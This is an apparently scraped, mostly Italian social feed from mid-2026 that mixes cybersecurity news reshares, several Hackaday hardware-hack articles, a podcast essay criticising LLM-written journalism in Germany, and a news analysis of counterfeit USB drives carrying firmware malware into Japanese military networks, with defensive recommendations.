Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Pavia anyone?
Con ben due speech sul ransomware (e sui LOLBins dei poveri) mi imbrilleggerò sul palco dipensando glitter e conoscenza.

Più del primo, a onor del vero! - e per il QR, colpa di @redflegias e @lorenzodm @BoostMediaAPS 😎

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

RHC Conference 2026 - Cybersecurity Volano della Competitività al Tempo dell'AI

📍Guarda il video: youtube.com/watch?v=Cu5kEyosOf…

#redhotcyber #rhcconference #conferenza #informationsecurity #ethicalhacking #dataprotection

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Arriva GLM-5.2: la risposta cinese a Mythos è open source e gira sul tuo PC

📌 Link all'articolo : redhotcyber.com/post/arriva-gl…

A cura di Massimiliano Brolli

#redhotcyber #news #intelligenzaartificiale #cybersecurity #aopensource #modellolinguistico #glm52

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Arriva GLM-5.2: la risposta cinese a Mythos è open source e gira sul tuo PC

📌 Link all'articolo : redhotcyber.com/post/arriva-gl…

A cura di Massimiliano Brolli

#redhotcyber #news #intelligenzaartificiale #cybersecurity #modelliai #opensource #aiopenweight

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

356 – Altro che lo Stato! Ci spia il telefono in tasca camisanicalzolari.it/356-altro…

Making a Magnetic Core Memory USB Drive


The media in this post is not displayed to visitors. To view it, please log in.

Some of us have felt somewhat nervous about the collapse of DRAM and NAND Flash memory supply in the consumer market, while others seem to have fully embraced it. Someone like [polymatt] for example, whose recent project entails a USB drive that skips back quite a few decades and opts to use a glorious 64-bit core memory device for storage.

To really embrace the DIY spirit here, the PCBs were milled using a small CNC router before the core memory was assembled alongside the other components, including apparently L293 H-bridge ICs as the drivers, along with an ESP32 module for the brains and USB interface.

Much like NAND Flash, core memory relies on sensing the state of a cell through a destructive read action, which thus requires a fair bit of surrounding logic to set up read and writes, parse sense line values and restore any read value after said destructive read. Determining the right voltage to use during read and write actions is essential, and here determined experimentally.

The final build contains two PCBs inside an enclosure that’s filled with silicone oil. Other than looking cool through the acrylic window, it also helps to keep the individual cores at a fairly consistent temperature, which is helpful with reliable bit flipping, even if it’s probably overkill here.

Ignoring for a moment that just the memory required for the USB stack in the ESP32 module is many times the size of this core memory device, it’s still a very cool project whose appeal goes far beyond mere practicality.

youtube.com/embed/IOtf85sHRlg?…


hackaday.com/2026/06/29/making…

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Attacco informatico a Jaguar Land Rover: PIL ridotto di 1,9 miliardi di sterline

📌 Link all'articolo : redhotcyber.com/post/attacco-i…

A cura di Carolina Vivianti

#redhotcyber #news #cyberattacchi #hacking #sicurezzainformatica #jaguarlandrover

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

5 anni, 119 estensioni, 2,6 milioni di vittime: la campagna steganografica scoperta da Microsoft su Edge

📌 Link all'articolo : redhotcyber.com/post/5-anni-11…

A cura di Luigi Zullo

#redhotcyber #news #microsoft #edge #infette #malware #cybersecurity #hacking #chrome #firefox

The Terrifying 2011-Era Case of Max Planck’s Retracted Papers


The media in this post is not displayed to visitors. To view it, please log in.

In the world of scientific publishing there are many reasons why a paper can be retracted, but generally there is an obvious and clearly communicated reason for doing so. Thus when [Yves Gingras] – a historian of physics – and [Mahdi Khelfaoui] – a colleague – noticed recently that two 1940s papers by [Max Planck] had been quite recently retracted, this resulted in an eyebrow-raising double-take, before naturally publishing their investigation’s findings on arXiv.

They first became aware of this courtesy of the site Retraction Watch and their list of ‘Retractions by Nobel Prize winners‘, which had the authors do a spit-take when they saw [Max Planck] listed. This page led them to a total of two database entries, as listed above. One is for a 1940 paper, the other for a 1942 paper, only five years before [Planck]’s death.

As for the provided reasons, both articles were struck with a generic ‘copyright violation’, which at the very least seems somewhat puzzling, and started both authors of this recent investigation on their journey. What they found was less of a nefarious plot and more of an accidental black hole that had formed when scientific journals began to digitize papers.

The original journal that [Planck]’s papers were published in was absorbed like so many into Springer Nature, where an automated system then tried to sort through all the papers, including the usual detecting of copyright issues. With these papers predating the era of convenient DOIs and the more standard forms of citing related works, said automated system appears to have become rather confused and hurt these papers in its confusion.

From the side of Springer Nature there has so far been no commentary on this, and as of writing the original papers are still listed as withdrawn. Although one can still read the original scanned papers via the Internet Archive, such as here the 1940 paper, it’s disturbing to see that automated systems have apparently been let loose on these veritable archives of scientific and academic history, heedless of the damage inflicted along the way.

Although after fifteen years these two retractions were finally noticed, the more harrowing question is probably just how many papers from potentially less well-known authors were quietly scuttled. If this can happen to [Planck]’s works, it would appear that nobody is safe, including legends like [Bohr], [Einstein] and so many others.


hackaday.com/2026/06/29/the-te…

Hard Drive Speakers Crank Out Classic Demo


The media in this post is not displayed to visitors. To view it, please log in.

Second Reality is a legendary demoscene release by Future Crew, which won Assembly 1993 with its technical and artistic mastery. [Niv Singer] decided to give the classic demo a spin on a rather unconventional sound system with a particuarly techy twist.

Hard drives are great for storing data. They’re designed for this purpose. What they’re not designed for is acting as speakers, but you can hack them into acting that way if you’re so inclined. For this project, [Niv] pulled apart a whole stack of drives, so they could be repurposed in this way. The principle is simple enough—just feed audio to the coil driving the head, and it will vibrate and wiggle around, creating soundwaves in the air. It’s not particularly effective, and you get limited volume with a terrible frequency response, but that’s half the fun. [Niv] actually took some of this into account, too. Four Western Digital Caviar 500GB drives were chosen for this build, two for the left channel, and two for the right. Each channel had a crossover, allowing one drive to handle low frequencies while the other handled higher ones. For a further nice touch, the platters spin with the beat as well, with [Niv] providing a great explanation on how this was achieved with the use of some nifty PWM tricks.

Files are on Github for the curious. We’ve featured plenty of hard drive speakers before, too. Video after the break.

youtube.com/embed/B1ybSPMPWo0?…


hackaday.com/2026/06/29/hard-d…

Cybersecurity & cyberwarfare ha ricondiviso questo.

#WhatsApp Usernames Are Coming. You Can Reserve Yours Right Now.
securityaffairs.com/194449/sec…
#securityaffairs #hacking #privacy
Cybersecurity & cyberwarfare ha ricondiviso questo.

U.S. Targets Russian Cyber Spies With $10M Bounty Over Messaging App Attacks
securityaffairs.com/194441/sec…
#securityaffairs #hacking #Ukraine #Russia

DK 10x37 - Intanto, in Germania...


The media in this post is not displayed to visitors. To view it, please log in.

The media in this post is not displayed to visitors. To view it, please log in.

Il caso Cadorff, o degli LLM contro il giornalismo


dk.dataknightmare.eu/dk10x37-i…


DK10x37 - Intanto, in Germania...


Ascolta l'episodio su Spreaker.com

Qualche giorno fa mi ha divertito leggere di quello che qui in Germania è uno scandalo: si è scoperto che l'ex editore e caporedattore e ora opinionista del Tagesspiel di Berlino, tale Carl-Andreas Casdorff, ha usato l'"Intelligenza Artificiale" per scrivere i suoi pezzi d'opinione.

Non ridete, qui in Germania non hanno quelli del Foglio, e la professione giornalistica ha ancora una certa dignità , almeno per ora. (A proposito, come va il Foglio AI? Hanno già decuplicato le copie e decimato i costi?)

Ad ogni modo, scoperta la cosa la direzione del Tagesspiel ha rimosso dal sito l'articolo incriminato e altri sospetti mentre indagano, sospendendo temporaneamente l'opinionista che ha fatto il doveroso mea culpa:

«Ho commesso un errore madornale, danneggiando la reputazione della testata e la mia. Per questo porgo le mie più sincere scuse. Nei testi ho utilizzato l’"Intelligenza Artificiale". Avrei dovuto chiarirlo e, di conseguenza, non avrei dovuto consentirne la pubblicazione».
dw.com, 21 giugno 2026


Casdorff evidentemente incarna lo Zeitgeist, lo spirito del tempo, perché negli stessi giorni un'altra testata, la Frankfürter Allgemeine Zeitung (FAZ) di Francoforte, ha rimosso dal sito il corsivo rilasciato da premier della Turingia, anche quello scritto con la cosiddetta "Intelligenza Artificiale", cioè con un modello linguistico.

E siccome in Italia siamo cialtroni mentre in Germania sì che sono gente seria, sulla questione è sceso in campo nientemeno che Mathias Döpfner, il CEO di Axel Springer.

Il quale buontempone, per stigmatizzare la decisione della FAZ, non ha trovato di meglio che chiedere anche lui a un modello linguistico un commento polemico che accusava la FAZ di rifiutare le tecnologie moderne, e paragonava la loro decisione a "un tentativo disperato della lobby delle carrozze per proibire le automobili".

Sono sicuro che Herr Döpfner pensa di essere molto furbo e intelligente, e infatti fa il CEO. Io però penso che si tratti solo di un sussiegoso imbecille, e che nello specifico, la sua profondità di analisi sulla questione tecnologica è inferiore a quella reperibile in un ragazzo del liceo.

Il cosiddetto "rifiuto delle nuove tecnologie" è l'argomento del padronato dall'invenzione del telaio a vapore, e dopo secoli come argomento è ancora una cagata pazzesca.

Il punto è che nessuno "rifiuta" (si sentono le virgolette?) le nuove tecnologie, per il semplice fatto che l'accettazione di una tecnologia è una scelta sociale, senza nessuna inevitabilità. La storia è piena di tecnologie che come società abbiamo semplicemente scelto di scartare.

La schiavitù, il lavoro minorile, la servitù debitoria come quelli di Downton Abbey, l'amianto, le armi chimiche, le mine antiuomo, la sorveglianza indiscriminata, certi farmaci, penso al talidomide, certi diserbanti, certe modifiche genetiche negli alimenti, negli animali e nell'uomo…

La questione della inevitabilità di certe tecnologie, il "questo è il futuro, adeguatevi o estinguetevi" nasce dall'incontro fra il libertarismo degli anni '60 statunitensi, e il libertarismo capitalista, quella che è stata battezzata "ideologia californiana".

Per una dimostrazione rapida di quello che sto dicendo, potete semplicemente ricordare che gli stessi argomenti (e spesso le stesse persone) che oggi sostengono l'inevitabilità dei modelli linguistici spacciati per "Intelligenza Artificiale" soltanto ieri venivano usati paro paro per dire che era inevitabile il Metaverso. E l'altro ieri venivano usati per la blockchain.

O, se volete fare gli sciccosi, potete rispolverare un Keynes d'annata (1930) e la sua previsione che la settimana lavorativa nel 2030 sarebbe stata di 15 ore.

Chi la mena con "il futuro sarà così e cosà", vuole soltanto vendere qualcosa, non foss'altro che se stesso come "futurologo". Che poi è solo un astrologo meno fantasioso, ma è pur sempre meglio che lavorare.

A questo punto entra in gioco anche una ricercatrice, Vera Katzenberger dell'università di Lipsia, che dice che il caso di Casdorff è importante perché fa vacillaree la fiducia nel giornalismo; il pubblico legge i giornali per l'esperienza o le prospettive di certi autori, e se i corsivi sono generati dall'"Intelligenza Artificiale", c'è un'interferenza nel modo in cui si forma la pubblica opinione; il pubblico potrebbe sentirsi ingannato.

E fin qui non ho niente da dire, ma poi la Katzenberger specifica:

Questo è un problema perché l'"Intelligenza Artificiale" non ha valori, non ha posizioni politiche, e non ha senso di responsabilità.
(ibid.)


Eh no. Uno su tre, da una ricercatrice ci aspettiamo di più.

Come sempre, il problema è il linguaggio con cui parliamo della cosidetta "Intelligenza Artificiale". Intanto è sbagliato e controproducente chiamarla così, noi stiamo parlando di modelli linguistici, cioè di motori statistici per la generazione di testi plausibili.

O, se vogliamo usare la mia nomenclatura preferita, stiamo parlando di generatori di stronzate. Che i testi siano plausibili non toglie niente al fatto che sono testi generati tirando dei dadi.

E poi ci si ostina a usare un linguaggio antropomorfico, a parlare dei modelli linguistici come se stessimo parlando di persone.

Un modello linguistico, che è un programma, non "ha" caratteristiche nel senso in cui le ha un essere umano, o un qualunque essere vivente, che possa è solo il delirio di quelli che fanno della tecnologia una religione; e dei pubblicitari, che ti dicono che il frigorifero, il deodorante o la berlina che devono vendere ha un "carattere".

Un modello linguistico al massimo può esibire dei bias nel modo in cui avviene la generazione del contenuto, se il bias è presente nei dati di addestramento o è fornito esplicitamente come istruzione (i cosiddetti"guardrail" non sono altro che indirizzamenti preferenziali dei risultati del motore).

Una piccola spiegazione tecnica. I modelli linguistici sono una applicazione delle tecniche chiamate di "machine learning": a un programma vengono forniti dei dati e il programma "apprende" (si sentono le virgolette?) cioè individua relazioni ricorrenti fra quei dati. Fornite dieci milioni di foto di gatti al machine learning, e il programma riesce a individuare se c'è un gatto in una nuova.

Il programma ha capito cosa sia un gatto? Certo che no. Sa soltanto come sono distribuiti i colori e le forme nelle foto di gatti che ha visto. Fornite una nuova foto, e il programma dirà se la foto contiene un gatto. A volte la risposta sarà corretta.

Fornite qualche al programma qualche miliardo di pagine scritte, e il programma ricostruisce dagli esempi che riceve le regole che governano la costruzione di frasi di senso compiuto.

Il programma ha imparato a parlare e a rispondere? No. Ma ha analizzato abbastanza domande e risposte da poter costruire una frase di risposta quando gli date una frase di domanda. A volte, la frase di risposta è di senso compiuto, e a volte è addirittura giusta.

Il programma esegue le stesse istruzioni, sia per fornire una risposta che noi riconosciamo come giusta, sia per una risposta che noi riconosciamo come sbagliata. Nel programma non c'è alcuna conoscenza, o modello del mondo, o vincolo di realtà. Il programma genera frasi, è l'utente che le valuta rispetto alla realtà.

Quindi sì, ovvio che il programma non ha alcun senso di responsabilità, il programma vede solo le correlazioni fra le parole della lingua che parliamo, e il senso di responsabilità non è lì più di quanto sia in una moneta lanciata o in una pallina della roulette, che pure, se prendiamo per buoni i ragionamenti dei techbro, anche loro decidono cose.

Un altro piccolo intermezzo tecnico.

Il Machine Learning funziona. Ma la qualità del suo funzionamento si basa sulla qualità dei dati di input. Il vecchio adagio "Garbage In, Garbage Out" vale per i modelli linguistici di oggi come per i programmi FORTRAN o COBOL di sessant'anni fa.

Prima di creare DataKnightmare, per un breve periodo ho pensato di poter fare Data Science. E quindi avevo creato la mia metodologia che avevo chiamato Ottuplice Via alla Data Science, sulla falsariga dell'ottuplice via per la virtù nel Buddismo.

I primi tre passi erano:

  1. corretta scelta delle fonti, cioè da dove raccogliamo i dati
  2. corretta raccolta dei dati, cioè quali dati prendiamo fra quelli disponibili
  3. corretta validazione dei dati raccolti, cioè controllare che i dati siano nel formato richiesto e abbiano i valori che ci aspettiamo. Per dire, una data è una data, ma giorno-mese-anno o mese-giorno-anno o anno-mese-giorno?

Ora, il punto era semplice. Non basta prendere dei dati. Occorre sapere che dati sono, come sono stati raccolti, occorre controllare eventuali errori o parzialità nella raccolta.

Questo è il motivo per cui ho mollato la Data Science: io parlavo di una disciplina, i dirigenti dicevano "boh, abbiamo questi dati, cerchiamo di farci qualcosa, e già che ci siamo facciamo in modo che questo qualcosa ci dica quello che vogliamo sentire".

Perché è facile dire che l'azienda è data driven, ma se il dirigente dice una cosa e la statistica dice l'opposto, che figura ci fa il dirigente?

Io vedevo i dati come strumento di indagine della realtà e guida nelle decisioni. I dirigenti vedevano qualcosa con cui giustificare le proprie decisioni ammantandole di una oggettività che non avevano.

Detta come va detta: la quasi totalità degli archivi aziendali non vale assolutamente nulla ma può essere usato per giustificare una cosa o il suo opposto, per il fatto che non c'è alcun controllo sulla qualità dei dati raccolti.

A questo punto cosa possiamo dire dei modelli linguistici come applicazione del Machine Learning? Il loro input è indiscriminatamente tutto il testo, di qualsiasi tipo, reperibile su Internet. E su Internet sappiamo che c'è tutto e il contrario di tutto. Ma non in parti uguali.

Ci sono materiali dettagliati, precisi, rigorosi, per produrre i quali qualcuno ha studiato e lavorato per anni.

E ci sono stupidate, cose volutamente finte, teorie della cospirazione, deliri, forum di sciroccati e neonazisti, cose che mi ha detto mio cuggino che lui ne capisce, eccetera eccetera.

Queste ultime sono enormemente più diffuse rispetto ai primi, ma il modello linguistico ingurgita tutto senza distinguere, e poi fa la media. Anche senza essere esperti di qualità dei dati, che livello di qualità avrà il risultato?

Quando dico che i modelli linguistici sono l'applicazione più stupida e bruta del machine learning, intendo questo.

Quello a cui vi rivolgete cercando risposte per la vostra vita, per la vostra salute, per il vostro lavoro e che chiamate "Intelligenza Artificiale" perché di quello vi hanno detto che si tratta, non è altro che la media pesata di tutto quello, fiori e merda, che si trova su internet, frullata, dolcificata, colorata del vostro colore, e impiattata, e voi ve la mangiate come se fosse una prelibatezza.

Non sto dicendo che siete stupidi, sto dicendo che vi hanno preso per il culo e vogliono continuare a farlo ma a pagamento.
Potete anche smettere di dargli retta.

OK, scusate la digressione ma le cose vanno capite, ora torniamo a bomba. La ricercatrice di Lipsia ci dice che il problema è che:

...l'"Intelligenza Artificiale" non ha valori, non ha posizioni politiche, e non ha senso di responsabilità.
(ibid.)


Abbiamo capito che "Intelligenza Artificiale" è un nome fuorviante, ma comunque la sola traccia di "senso di responsabilità" in un modello linguistico possono essere al massimo (dico al massimo perché poi esiste Grok) le cosiddette "guardrails", quelle istruzioni a posteriori che dovrebbero (il condizionale ipotetico è d'obbligo) impedire che il modello linguistico vi spieghi come produrre un'arma chimica o si metta a fare discorsi neonazisti.

Sappiamo benissimo che i guardrail funzionano solo nella mente di chi deve venderli, perché vanno contro al fatto ineludibile che un motore statistico funzionerà come un motore statistico anche se gli diciamo di non farlo. I "guardrail" sono come scrivere "non uscire" su cinque facce di un dado e sperare che grazie a questo esca sempre la sesta. Davvero, è questo che vi stanno vendendo.

E i valori, e le posizioni politiche? Quelli rifletteranno i dati di input, e quindi saranno fortemente a favore dei valori e delle posizioni numericamente più ripetute, giuste o sbagliate che siano. Aprite instagram o qualsiasi social e fatevi iun'idea.

Come ciliegina sulla torta, poi, c'è sempre la possibilità che il padrone del modello linguistico metta degli altri "guardrail" a difesa dei valori e delle posizioni politiche che preferisce, o che gli fanno comodo. E naturalmente non è tenuto a farne parola con chicchessia.

Ecco. Per come la vedo io, il problema non è che il modello linguistico non ha valori o posizioni politiche. Il modello linguistico riflette come minimo i valori e le posizioni più presenti in rete, e già quello è un problema. E magari ha anche qualche ulteriore aiutino. Considerare uno strumento del genere come politicamente neutro è pura follia.

E non basta. Perché c'è già uno studio che mostra come anche solo usandolo per una stesura iniziale, il modello linguistico influenza il linguaggio che comparirà nella versione finale, sia dal punto di vista stilistico, che di vocabolario, che di contenuti.

Un corsivista che si lascia imboccare dal modello linguistico foss'anche solo per fare brainstorming o per usarlo come userebbe un ascoltatore umano, sta accettando di essere condotto, lentamente ma inesorabilmente, nel migliore dei casi verso valori e posizioni medi accettabili, e nel peggiore, verso valori e posizioni preferiti dal padrone del modello linguistico.
Gaslighting as a Service, ma che bella idea.

Il modello linguistico non si stanca mai, parla e risponde come una persona, e noi ci siamo evoluti per ascoltare le persone, non per trattarle come oggetti. Quindi quando il modello ti mette di fronte a un argomento che magari non avresti mai usato, tu non rifiuti a priori, lo giri e lo rigiri, cambi un po' lo stile e magari te lo fai andare bene. In altre parole hai deciso cosa pensi con un lancio di dadi, magari pure truccati.

Non mi piace dire cose ovvie, ma c'è questa bella citazione da Dune, di Frank Herbert:

Un tempo, gli uomini affidarono alle macchine il compito di pensare per loro nella speranza che ciò li rendesse liberi. Ma ciò permise solo ad altri uomini che possedevano le macchine di ridurli in schiavitù.


Compite un atto rivoluzionario: pensateci.


Piano Escapement Migrates to Drum Kit


The media in this post is not displayed to visitors. To view it, please log in.

For as popular as the piano is in music studios, homes, and schools, it almost defies logic. Compared to a guitar, harmonica, or drum set, pianos are incredibly complex machines that can have somewhere on the order of 8,000 moving parts in a case that can easily weigh hundreds of pounds and which often responds quite poorly to seasonal changes in temperature and humidity. But for putting up with all of these downsides, musicians are rewarded with an instrument that uniquely responds to touch, style, and emotion. A big reason for that is that mechanical complexity, and [Super Valid Designs] is attempting to bring that design to a drum set.

Compared to the complex machinery that connects the movement of a piano’s key to its hammer striking a string, a kick drum pedal is much simpler. It can only bounce off of the drum or get “buried” where the beater remains pressed up against the drum after hitting it. [Super Valid Designs] wanted something with a bit more finesse and control, so he first 3D printed a mechanism that throws the beater towards the drum head and then disconnects it mechanically from the pedal, so that it rebounds even if the pedal stays depressed. The next steps were more difficult, which involved making sure the mechanism reset itself in a repeatable way, without making too much noise of its own. This involved trying out a few different ideas and printing a massive amount of subtly different linkages, but in the end he’s left with a machine that nearly replicates all of the parts of a piano’s escapement,

The end goal of this project wasn’t simply to reproduce piano mechanisms on a drum set, though. [Super Valid Designs] hopes to make a kick drum that’s much smaller than those found in traditional kits, and since smaller drums respond poorly when the beater remains on or near the drum after striking it, a mechanism like this will dramatically improve the performance of the smaller drum and help reduce the requirement for perfect technique. And, maybe in 50 years or so, these types of escapements will take over the drumming world just like the piano escapement took over keyboards after its invention in the 1700s. Some simpler piano actions have been built before, but the complexity seems to be a requirement for all of the tasks they need to do whether its for a piano or a drum.

youtube.com/embed/_LMGgqMb2KI?…


hackaday.com/2026/06/29/piano-…

2026 Frikkin Lasers Challenge: Super-Simple Laser Precision for Your Stargazing


The media in this post is not displayed to visitors. To view it, please log in.

Perhaps the hardest thing for amateur astronomers just starting out is finding the things you want to look at. Prolific maker [mircemk] has submitted a quick-and-easy star-hopper device that will help guide your binoculars with laser-like precision using things you likely already have on hand: a smartphone, a mounting plate, and a green laser pointer.

The smartphone is running AstroHopper, an astronomy app that uses GPS and inertial navigation to know exactly where your phone is pointing, and offer an image of the sky on the screen. There are many others of this ilk, and there’s no reason [mircemk]’s trick won’t work with your favorite. The trick is decidedly simple: the smartphone is mounted to a flat plate, in line with a green laser pointer. Careful placement aligns the axis of the phone and the laser, and the mounting plate is set up to fit a tripod.

Using it is simple: with a labelled view of the sky displayed on the screen, one lines up the phone/laser combo with the desired object, and activates the laser pointer. [micremk] has wired in an on-off switch for this purpose and a large external battery, rather than relying on the stock pushbutton. Since the axis of the laser pointer and the phone are aligned, a green line launches out into the heavens for you to follow with your binoculars. Once you locate that green dot, you can turn off the laser. Yes, the computer has helped you find the object, but your muscles are doing the slewing and that will make it much more likely you start to learn the sky yourself rather than relying on electronic magic.

This is probably the simplest hack we’ve yet seen in the Frikkin’ Lasers Challenge, and yet also one of the most practical. If you enjoy playing with radiation that’s spontaneously emitted, there’s still time to get your entry together — the contest runs until July 23, 2026.

youtube.com/embed/2nefHD0iOj4?…

2026 Hackaday Freaking Lasers Contest


hackaday.com/2026/06/29/2026-f…

The media in this post is not displayed to visitors. To view it, please log in.

USB contraffatti made in China nelle reti classificate delle Forze di Autodifesa giapponesi: un anno di spionaggio silenzioso


@Informatica (Italy e non Italy)
Nikkei rivela come chiavette USB cinesi contraffatte, distribuite durante le operazioni di soccorso post-terremoto, abbiano compromesso per quasi un anno sistemi


USB contraffatti made in China nelle reti classificate delle Forze di Autodifesa giapponesi: un anno di spionaggio silenzioso


Tra marzo 2024 e febbraio 2025, le Forze di Autodifesa Terrestre giapponesi (JGSDF) hanno inconsapevolmente utilizzato chiavette USB contraffatte — prodotte in Cina e contenenti malware riconducibile a gruppi APT legati a Pechino — su computer collegati a reti classificate. La scoperta, rivelata da un’inchiesta di Nikkei Asia basata su documenti interni riservati, ha portato alla luce una delle operazioni di compromissione hardware più significative degli ultimi anni a danno di una forza armata del G7.

Il vettore di infezione: hardware come arma


Tutto inizia con il terremoto della penisola di Noto nel gennaio 2024. Durante le operazioni di soccorso, l’headquarter del Middle Army della JGSDF a Itami, nei pressi di Osaka, riceve otto chiavette USB da fonti esterne all’Ishikawa Prefecture come parte della risposta all’emergenza. I dispositivi, acquistati a prezzi ben al di sotto di mercato tramite canali non ufficiali, vengono distribuiti senza verifiche adeguate e collegati a sistemi operativi. Le scansioni di sicurezza obbligatorie, che avrebbero dovuto rilevare anomalie prima dell’utilizzo, falliscono nel identificare il payload malevolo nascosto nel firmware delle chiavette.

La tecnica non è nuova, ma rimane devastantemente efficace: il malware si annida a livello di controller USB, operando al di sotto del sistema operativo e risultando invisibile agli strumenti di endpoint detection standard. L’esecuzione è automatica — nessuna interazione dell’utente è richiesta al di là dell’inserimento del dispositivo nella porta USB.

Undici mesi di presenza silenziosa


La compromissione rimane non rilevata per quasi un anno. È solo nel febbraio 2025 che un soldato di stanza a Itami nota il suo computer funzionare in modo insolitamente lento. La scansione del sistema rivela un virus che opera silenziosamente in background da mesi. A quel punto, secondo l’inchiesta di Nikkei, oltre 50 computer avevano già interagito con le chiavette infette — con quasi la metà di questi sistemi appartenente a reti chiuse utilizzate per la gestione di informazioni altamente classificate, inclusi movimenti di truppe e pianificazione operativa.

L’analisi forense dei dispositivi ha rilevato che sei delle otto chiavette distribuite durante l’operazione di soccorso contenevano lo stesso malware. Il ceppo è stato documentato da una società di cybersecurity statunitense come riconducibile a un gruppo di hacker sponsorizzato dallo Stato cinese, presentando pattern di comunicazione con infrastrutture C2, tecniche di offuscamento e modalità di deployment del payload coerenti con campagne di cyberspionaggio di matrice cinese.

Caratteristiche tecniche del malware


Il malware incorporato nei controller USB delle chiavette contraffatte presenta diverse caratteristiche tecniche rilevanti per i difensori:

  • Esecuzione automatica alla connessione (AutoRun firmware-level): il codice malevolo si attiva al momento dell’inserimento, senza richiedere l’interazione dell’utente o l’abilitazione di funzionalità AutoRun a livello OS — il tradizionale metodo di difesa risulta quindi inefficace.
  • Operatività below-OS: il malware opera a livello di firmware del controller USB, rendendo invisibile la sua presenza agli strumenti di endpoint detection convenzionali che operano sopra il livello del sistema operativo.
  • C2 covert channel: pattern di comunicazione C2 coerenti con APT cinesi documentati, con tecniche di offuscamento del traffico di rete progettate per simulare traffico legittimo.
  • Payload modulare: capacità di raccogliere metadata di sistema, accedere a file sensibili ed esfiltrare dati anche in ambienti air-gapped attraverso timing covert channel.
  • Evasione di scan standard: sei dispositivi su otto hanno superato le scansioni di sicurezza obbligatorie, suggerendo una progettazione specifica per eludere i tool AV/EDR in uso negli ambienti militari giapponesi.


# IoC e indicatori di compromissione documentati (aggregati da fonti pubbliche)
Vettore: USB firmware-level malware
Origine hardware: dispositivi contraffatti prodotti in Cina, venduti su marketplace online a prezzi anomalmente bassi
Distribuzione: canali non ufficiali durante operazioni di emergenza (terremoto Noto, gennaio 2024)
Esecuzione: automatica all'inserimento USB, nessuna interazione richiesta
Sistemi colpiti: Windows (ambienti military-grade JGSDF)
Rilevamento: febbraio 2025, dopo ~11 mesi di presenza silenziosa
Attribuzione: ceppo documentato come China-linked da vendor statunitense (nome non divulgato)
C2 pattern: traffico HTTP/S offuscato verso IP non pubblicamente rivelati
Impatto: 50+ computer, ~50% su reti classificate (movimenti truppe, pianificazione operativa)
Settori colpiti oltre JGSDF:
- Impianti manifatturieri (fabbriche di elettronica)
- Laboratori di ricerca chimica
- Studi di ingegneria
- Potenzialmente altri acquirenti dei drive online

Il silenzio istituzionale: una seconda vulnerabilità


Altrettanto allarmante è la gestione post-discovery. Dopo aver scoperto la compromissione nel febbraio 2025, la JGSDF ha scelto di mantenere l’incidente riservato, senza allertare il pubblico né emettere avvisi ai potenziali altri acquirenti degli stessi drive disponibili online. Una decisione che ha lasciato esposti fabbriche, laboratori di ricerca e istituti di ingegneria in tutto il Giappone che avevano acquistato gli stessi dispositivi contraffatti attraverso retailer online, come documentato nell’inchiesta follow-up di Nikkei. Lo stesso malware, con le stesse caratteristiche tecniche, continuava a diffondersi attraverso la supply chain commerciale mentre le forze armate tacevano.

Il Ministero della Difesa ha confermato solo che una chiavetta USB acquisita dalla JGSDF Middle Army headquarters è stata trovata contenere malware nel febbraio 2025, fermandosi ben al di sotto di una disclosure pubblica completa.

Contesto geopolitico: la strategia della “contaminazione silenziosa”


L’incidente si inserisce in un pattern più ampio di operazioni cyber cinesi contro infrastrutture militari e industriali in Asia-Pacifico. L’utilizzo di hardware contraffatto come vettore di compromissione, noto nel settore come hardware supply chain attack, presenta vantaggi operativi significativi rispetto agli attacchi software-based: bypassa i perimetri di rete, è difficile da attribuire in modo conclusivo, e può colpire sistemi air-gapped che sarebbero altrimenti irraggiungibili.

Il timing è particolarmente rilevante: l’operazione si sovrappone al periodo di tensione crescente nel Mar Cinese Orientale e alle dispute territoriali sulle isole Senkaku/Diaoyu, e avviene mentre il Giappone accelera la modernizzazione delle proprie capacità militari nell’ambito dell’AUKUS-Plus e della partnership con gli Stati Uniti. La capacità di monitorare movimenti di truppe e pianificazione operativa — anche prima di un eventuale conflitto — rappresenta un vantaggio strategico difficilmente sopravvalutabile.

Due righe per i difensori


  • USB allowlisting hardware: implementare soluzioni di controllo dell’accesso USB che verifichino l’identità del dispositivo a livello di firmware, non solo a livello di driver OS.
  • Validazione su sistemi isolati: tutti i dispositivi removibili devono essere sottoposti a scansione su sistemi dedicati e air-gapped prima di essere connessi a reti operative.
  • Procurement da vendor certificati: zero tolerance per dispositivi acquisiti tramite canali non ufficiali, indipendentemente da urgenze operative o logistiche.
  • Firmware integrity check: adottare tool in grado di analizzare il firmware del controller USB, non solo il contenuto del filesystem del dispositivo.
  • Zero Trust per removable media: trattare ogni dispositivo rimovibile come potenzialmente ostile, indipendentemente dalla provenienza apparente.
  • Incident disclosure tempestiva: un protocollo di notifica coordinata agli stakeholder potrebbe aver limitato la diffusione del malware attraverso la supply chain commerciale.

L’incidente delle chiavette USB nelle JGSDF è un promemoria brutale che la supply chain dell’hardware — specialmente per dispositivi a basso costo prodotti in contesti geopoliticamente sensibili — rappresenta un vettore di attacco che le organizzazioni ad alta sicurezza non possono permettersi di sottovalutare. La semplicità del vettore, una chiavetta USB da pochi dollari distribuita durante un’emergenza, rende la lezione ancora più amara.


Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

The media in this post is not displayed to visitors. To view it, please go to the original post.

✨ USB contraffatti made in China nelle reti classificate delle Forze di Autodifesa giapponesi: un anno di spionaggio silenzioso
#CyberSecurity
insicurezzadigitale.com/usb-co…

@informatica


USB contraffatti made in China nelle reti classificate delle Forze di Autodifesa giapponesi: un anno di spionaggio silenzioso


Tra marzo 2024 e febbraio 2025, le Forze di Autodifesa Terrestre giapponesi (JGSDF) hanno inconsapevolmente utilizzato chiavette USB contraffatte — prodotte in Cina e contenenti malware riconducibile a gruppi APT legati a Pechino — su computer collegati a reti classificate. La scoperta, rivelata da un’inchiesta di Nikkei Asia basata su documenti interni riservati, ha portato alla luce una delle operazioni di compromissione hardware più significative degli ultimi anni a danno di una forza armata del G7.

Il vettore di infezione: hardware come arma


